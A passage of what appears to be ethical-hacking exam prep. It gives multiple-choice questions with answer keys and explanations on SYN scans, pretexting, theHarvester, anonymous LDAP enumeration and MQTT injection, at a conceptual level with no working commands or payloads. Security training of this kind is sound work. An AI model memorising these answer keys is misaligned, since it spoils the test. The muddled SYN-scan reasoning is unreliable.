C is correct because a SYN scan (also known as a half-open scan) sends TCP SYN packets to target ports and does not complete the three-way handshake. If no SYN-ACK is returned, it indicates the port is filtered or the host is not responding, which matches the scenario where the attacker receives no SYN-ACK responses. This scan is stealthier than a full TCP connect scan because it never establishes a full connection.
Exam trap
The trap here is that candidates often confuse SYN scan with TCP connect scan, thinking that any TCP scan must complete the handshake, but the key distinction is that SYN scan never sends the final ACK, making it half-open and stealthier.
How to eliminate wrong answers
Option A is wrong because a TCP connect scan completes the full three-way handshake (SYN, SYN-ACK, ACK) and would result in SYN-ACK responses for open ports, not the absence of them. Option B is wrong because a UDP scan sends UDP packets, not TCP SYN packets, and relies on ICMP unreachable messages or lack of response, not TCP SYN-ACK behavior. Option D is wrong because a FIN scan sends TCP packets with the FIN flag set, not SYN packets, and expects RST responses for closed ports, not SYN-ACKs.
A penetration tester calls an employee claiming to be from the IT help desk and asks for their password to perform a 'security update'. The employee provides the password. Which social engineering technique is being used?
A.Pretexting
B.Tailgating
C.Quid pro quo
D.Phishing
AnswerA
Pretexting uses a fabricated scenario to obtain information.
Why this answer
The attacker is fabricating a scenario (IT help desk performing a security update) to manipulate the target into revealing sensitive information. This is the essence of pretexting, where the attacker creates a false identity or situation to gain trust and extract data. Unlike phishing, which typically uses malicious links or attachments, this attack relies purely on verbal impersonation and social manipulation.
Exam trap
The trap here is that candidates confuse pretexting with phishing because both involve deception, but phishing specifically uses electronic channels (email, fake login pages) while pretexting can occur over voice or in person without any technical payload.
How to eliminate wrong answers
Option B is wrong because tailgating involves physically following an authorized person into a restricted area without their consent, not deceiving someone over the phone. Option C is wrong because quid pro quo involves offering a service or benefit in exchange for information (e.g., 'I'll fix your computer if you give me your password'), whereas here the attacker simply demands the password under a false pretense. Option D is wrong because phishing typically uses electronic communication (email, SMS, fake websites) to trick victims into clicking a link or downloading malware, not a direct phone call asking for credentials.
During a penetration test, the tester wants to discover all subdomains of a target domain using an OSINT technique. Which tool is specifically designed for subdomain enumeration via search engines and public records?
A.theHarvester
B.Maltego
C.Shodan
D.dnsrecon
AnswerA
theHarvester is designed to gather emails, subdomains, and other information from public sources.
Why this answer
theHarvester is specifically designed to perform OSINT-based subdomain enumeration by querying search engines (e.g., Google, Bing) and public data sources (e.g., PGP key servers, DNSDumpster). It collects email addresses, subdomains, IPs, and virtual hosts without direct interaction with the target's infrastructure, making it ideal for passive reconnaissance.
Exam trap
EC-Council often tests the distinction between passive OSINT tools (theHarvester) and active reconnaissance tools (dnsrecon), so candidates mistakenly choose dnsrecon because it is a DNS tool, but the question explicitly requires an OSINT technique using search engines and public records.
How to eliminate wrong answers
Option B (Maltego) is wrong because it is a general-purpose OSINT and link-analysis platform that requires transforms (some of which are paid) and is not solely focused on subdomain enumeration via search engines; it is overkill for this specific task. Option C (Shodan) is wrong because it is a search engine for internet-connected devices and services (e.g., IoT, servers), not for enumerating subdomains of a target domain via search engines or public records. Option D (dnsrecon) is wrong because it performs active DNS reconnaissance (e.g., zone transfers, brute-force subdomain discovery) and is not an OSINT technique that relies on search engines and public records.
During a penetration test, you discover an LDAP server on port 389 that allows anonymous binds. Which of the following enumeration techniques would provide the MOST comprehensive information about the directory structure?
A.Run nmap with the smb-enum-shares script
B.Perform a DNS zone transfer
C.Use ldapsearch to query the directory for all attributes
D.Use net view to list domain resources
AnswerC
ldapsearch can retrieve all objects and attributes from an LDAP directory, especially with anonymous bind.
Why this answer
Option C is correct because `ldapsearch` with anonymous bind allows querying the LDAP directory for all attributes and entries, providing comprehensive information about the directory structure, including user accounts, groups, organizational units, and other objects. LDAP servers on port 389 often expose the entire directory tree when anonymous binds are permitted, making `ldapsearch` the most effective enumeration technique.
Exam trap
The trap here is that candidates confuse LDAP enumeration with SMB or DNS enumeration, assuming any network discovery tool will work, but only LDAP-specific queries (like `ldapsearch`) can extract directory structure from an LDAP server.
How to eliminate wrong answers
Option A is wrong because `nmap` with the `smb-enum-shares` script targets SMB (port 445) and enumerates Windows file shares, not LDAP directory structure on port 389. Option B is wrong because DNS zone transfer (using `dig` or `nslookup`) retrieves DNS records (A, MX, CNAME, etc.) from a DNS server, not LDAP directory attributes or objects. Option D is wrong because `net view` is a Windows command that lists SMB shared resources on a network, not LDAP directory entries.
An IoT device uses the MQTT protocol without TLS. An attacker on the same network captures messages and publishes a fake temperature reading. Which attack is being executed?
A.Replay attack
B.Firmware reversing attack
C.Man-in-the-middle attack
D.Denial of service attack
AnswerC
The attacker intercepts and injects messages, which is MITM on an unencrypted MQTT session.
Why this answer
MQTT over plain TCP allows message interception and injection (man-in-the-middle) because no encryption or authentication is enforced.